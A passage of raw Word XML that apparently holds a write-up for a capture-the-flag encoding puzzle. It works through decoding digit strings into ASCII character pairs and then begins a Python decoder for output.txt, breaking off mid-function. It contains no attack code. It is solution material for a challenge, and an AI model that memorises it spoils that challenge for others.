        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>s even, i=12, and AB="9548".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3302D2AB" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Split AB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58B760" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>95 and 48 → ASCII: 95 '_', 48 '0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F9BC3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> line 0 gives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46878964" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>for i1=12: first char '_' (95)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE9D6A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>for the other index i2: first char '0' (48)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9CE6A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Line 1 → detect odd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0895A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>The line ends with "5" → i=5, AB="49109".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46324186" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Split AB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110886E0" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>49 and 109 → ASCII: 49 '1', 109 'm'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2B0702" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> line 1 gives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B8A415" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>for i1=12: second char '1' (49)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B70A0" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>for i2=5: second char 'm' (109)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C9068" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Put together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CA265" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pair[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>12] = ('_', '1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEFADE" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pair[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>5] = ('0', 'm')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B125B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Do this for each subsequent line pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087C02B5" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="2240E3FF">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18807E79" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:lastRenderedPageBreak/>
        <w:t>6) Full decoder (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14809B96" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Save as decoder.py next to output.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD82BD" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t># decoder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED5DCE" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>def detect_even_all_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>positions(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>s, max_i=32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D349D2D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    hits = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E8C0F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for i in range(max_i):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCFE495" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        t = str(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580E665" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        start = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13885B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162F8D5" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            pos = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>s.find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(t, start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0BAD3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            if pos == -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C1A61" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECCC57D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            head = s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>[:pos</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C14CD7" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            tail = s[pos+len(t):]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD9478" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            if head and tail == head</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>[::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>-1]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38259A8F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>hits.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>((i, head))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A7270F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            start = pos + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48922C63" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    return hits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDA5D0" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="488ED9DB" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>def split_two_ascii(ab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48705D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    """Try 2/3-digit splits for A, rest for B; keep printable ASCII [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>32..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>126]."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B7668" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    pairs = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA265B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for l1 in (2, 3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E6234" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        if l1 &lt; len(ab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A2327" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            a, b = int(ab</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>[:l</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1]), int(ab[l1:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A38D32" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            if 32 &lt;= a &lt;= 126 and 32 &lt;= b &lt;= 126:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446CA4EF" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pairs.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>((a, b))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170042A3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    return pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00092A94" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="7AB32E8D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>def decode_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>options(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>line, max_i=32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470DDFAB" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    s = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>line.strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A81C1" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    opts = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760B2C4" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="73B6C12C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    # Try even pattern (mirror around i anywhere in the string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DA920" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for idx, ab in detect_even_all_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>positions(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>s, max_i):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDF915" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        for a, b in split_two_ascii(ab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7966E8" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>opts.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(("even", idx, (a, b)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456DA8AC" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="1AECB8E3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    # Try odd pattern (endswith i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D8D3F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for idx in range(max_i):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A066E2" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        t = str(idx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39979A09" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>s.endswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(t) and len(s) &gt; len(t):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD0C03" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            ab = s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>[:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>len(t)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C2802C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            for a, b in split_two_ascii(ab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBCA7C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>opts.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(("odd", idx, (a, b)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853E138" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="24F40A05" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    return opts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41313224" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="175D5E21" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0E3AA" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    lines = [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>l.strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>() for l in open("output.txt"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>).splitlines</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">() if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>l.strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5ADC20" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    opts_per_line = [decode_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>options(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>l, max_i=64) for l in lines]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBC311" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="29373E5D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    # In this challenge, each line has a unique valid decode, so pick [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476051CC" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    pairs = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552EDB0C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for k in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
